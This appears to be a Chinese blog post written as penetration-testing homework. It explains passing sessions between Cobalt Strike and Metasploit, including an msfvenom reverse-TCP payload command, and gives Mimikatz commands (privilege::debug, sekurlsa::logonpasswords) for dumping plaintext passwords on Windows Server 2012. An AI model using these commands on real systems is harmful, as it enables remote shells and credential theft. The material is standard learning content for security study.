• 第2次作业


    问题:cs与msf权限传递,以及mimikatz抓取win2012明文密码。

    一、CS与MSF权限传递

    CS(Cobalt Strike)和MSF(Metasploit Framework)是两种常用的渗透测试工具,它们都支持在渗透过程中传递权限。以下是两者之间传递权限的一般步骤:

    从Metasploit向Cobalt Strike传递会话
    1. 在Metasploit中获取会话:使用Metasploit渗透目标系统并获得会话。
    2. 启动Metasploit RPC服务:在Metasploit控制台中启动RPC服务,以便Cobalt Strike可以与Metasploit通信。

       load msgrpc ServerHost=127.0.0.1 Pass=yourpassword


    3. 配置Cobalt Strike:在Cobalt Strike中配置Metasploit RPC设置,使其能够连接到Metasploit的RPC服务。

     metasploit_rpc_login("127.0.0.1", 55553, "yourpassword")


    4. 传递会话:在Cobalt Strike中使用`metasploit_import`命令导入Metasploit会话。

    从Cobalt Strike向Metasploit传递会话 


    1. 在Cobalt Strike中获取会话:使用Cobalt Strike渗透目标系统并获得会话。
    2. 生成Payload:在Metasploit中生成一个Payload,用于接收Cobalt Strike的会话。

       msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f exe > payload.exe


    3. 在Cobalt Strike中执行Payload:将生成的Payload上传到目标系统并执行,以便Metasploit接收到会话。
    4. 接收会话:在Metasploit中配置并监听相应的端口,以接收传递过来的会话。

    二、 使用Mimikatz抓取Windows 2012明文密码

    Mimikatz是一款强大的工具,用于从Windows系统中提取明文密码、哈希、PIN码等。以下是使用Mimikatz抓取Windows 2012明文密码的步骤:

    1. 下载并解压Mimikatz:从GitHub上下载Mimikatz工具,并解压到本地。
    2. 以管理员身份运行命令提示符:打开命令提示符,并以管理员身份运行。
    3. 执行Mimikatz:导航到Mimikatz所在目录,并启动Mimikatz。

    1.    cd path\to\mimikatz
    2.    mimikatz.exe


    4.启用调试特权:在Mimikatz控制台中启用调试特权。

       privilege::debug


    5. 抓取明文密码:使用以下命令来抓取明文密码。
     

       sekurlsa::logonpasswords

  • 相关阅读:
    uniapp 路由不要显示#
    【论文阅读】YOLO-World | 开集目标检测
    史上超强最常用SQL语句大全
    android应用开发基础知识,安卓面试2020
    Linux学习6—文件的查找与压缩
    做web自动化测试遇到Chrome浏览器老是自动更新,怎么办 ? 这里提供两个解决办法 。
    基于单片机的太阳能灯(热释电)电路设计(#0222)
    前端周刊第三十五期
    python:OderedDict函数
    法线贴图Shader
  • 原文地址:https://blog.csdn.net/Wincreds/article/details/139999456